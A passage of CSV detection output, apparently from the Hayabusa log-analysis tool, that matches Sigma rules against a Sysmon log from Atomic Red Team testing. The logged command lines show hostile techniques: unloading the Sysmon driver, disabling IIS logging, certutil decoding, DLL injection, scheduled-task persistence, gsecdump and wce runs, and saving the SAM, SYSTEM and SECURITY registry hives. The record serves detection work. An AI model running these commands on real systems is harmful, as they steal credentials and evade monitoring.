powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:04.270 +09:00,MSEDGEWIN10,1,medium,Suspicious Copy From or To System32,,rules/sigma/process_creation/win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:04.294 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd.exe /c copy C:\Windows\\system32\\certutil.exe C:\Users\IEUser\AppData\Local\Temptcm.tmp : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c copy %windir%\\system32\\certutil.exe %temp%tcm.tmp""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:04.294 +09:00,MSEDGEWIN10,1,medium,Suspicious Copy From or To System32,,rules/sigma/process_creation/win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:04.333 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c %%temp%%tcm.tmp -decode c:\file.exe file.txt"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:04.333 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:04.361 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd.exe /c C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c %temp%tcm.tmp -decode c:\file.exe file.txt""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:04.361 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:04.412 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt : Path: C:\Users\IEUser\AppData\Local\Temptcm.tmp : User: MSEDGEWIN10\IEUser : Parent Command: cmd.exe /c C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:04.412 +09:00,MSEDGEWIN10,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:04.412 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:04.643 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:14.715 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""fltmc.exe unload SysmonDrv"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:14.758 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:14.944 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\System32\inetsrv\appcmd.exe set config "" ""Default /section:httplogging /dontLog:true"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:14.991 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:15.776 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\mavinject.exe"" 3912 /INJECTRUNNING C:\AtomicRedTeam\atomics\T1055\src\x64\T1055.dll : Path: C:\Windows\System32\mavinject.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:15.776 +09:00,MSEDGEWIN10,1,critical,MavInject Process Injection,,rules/sigma/process_creation/win_mavinject_proc_inj.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:16.496 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c .\bin\T1055.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:16.552 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:44.283 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:46.073 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""at 13:20 /interactive cmd"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:46.094 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task Management AT : Command: at 13:20 /interactive cmd : Path: C:\Windows\System32\at.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""at 13:20 /interactive cmd""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:46.094 +09:00,MSEDGEWIN10,1,high,Interactive AT Job,,rules/sigma/process_creation/win_interactive_at.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:46.207 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:46.422 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:46.459 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task Management : Command: SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10 : Path: C:\Windows\System32\schtasks.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:46.459 +09:00,MSEDGEWIN10,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:46.640 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:46.828 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "" Atomic ""task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:46.849 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task Management : Command: SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "" Atomic ""task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10 : Path: C:\Windows\System32\schtasks.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "" Atomic ""task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:46.849 +09:00,MSEDGEWIN10,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:46.927 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:47.218 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a -c"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:47.238 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: pcalua.exe -a -c : Path: C:\Windows\System32\pcalua.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a -c""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:50.398 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a Java"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:50.453 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: pcalua.exe -a Java : Path: C:\Windows\System32\pcalua.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a Java""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:52.923 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a C:\Windows\system32\javacpl.cpl"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:52.982 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: pcalua.exe -a C:\Windows\system32\javacpl.cpl : Path: C:\Windows\System32\pcalua.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a C:\Windows\system32\javacpl.cpl""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:53.882 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:54.099 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:54.129 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe : Path: C:\Windows\System32\forfiles.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:54.165 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:54.165 +09:00,MSEDGEWIN10,1,low,Indirect Command Execution,,rules/sigma/process_creation/win_indirect_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:55.069 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c "" c:\folder\normal.dll:evil.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:55.138 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: forfiles /p c:\windows\system32 /m notepad.exe /c c:\folder\normal.dll:evil.exe : Path: C:\Windows\System32\forfiles.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c "" c:\folder\normal.dll:evil.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:55.236 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:58.359 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:09:40.973 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 4516 288 0000023C0CA1FA70 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:09:43.329 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:09:59.931 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: powershell : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:09:59.931 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:07.994 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\whoami.exe"" /user : Path: C:\Windows\System32\whoami.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:07.994 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:07.994 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:08.184 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:16.487 +09:00,MSEDGEWIN10,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:16.487 +09:00,MSEDGEWIN10,10,high,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:16.487 +09:00,MSEDGEWIN10,10,high,Mimikatz Detection LSASS Access,,rules/sigma/deprecated/sysmon_mimikatz_detection_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:16.986 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""gsecdump -a"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:17.027 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:17.107 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""wce -o output.txt"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:17.149 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:17.224 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\sam sam"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:17.243 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg save HKLM\sam sam : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\sam sam""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:21.090 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\system system"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:21.105 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg save HKLM\system system : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\system system""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:23.317 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\security security"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:23.336 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg save HKLM\security security : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\security 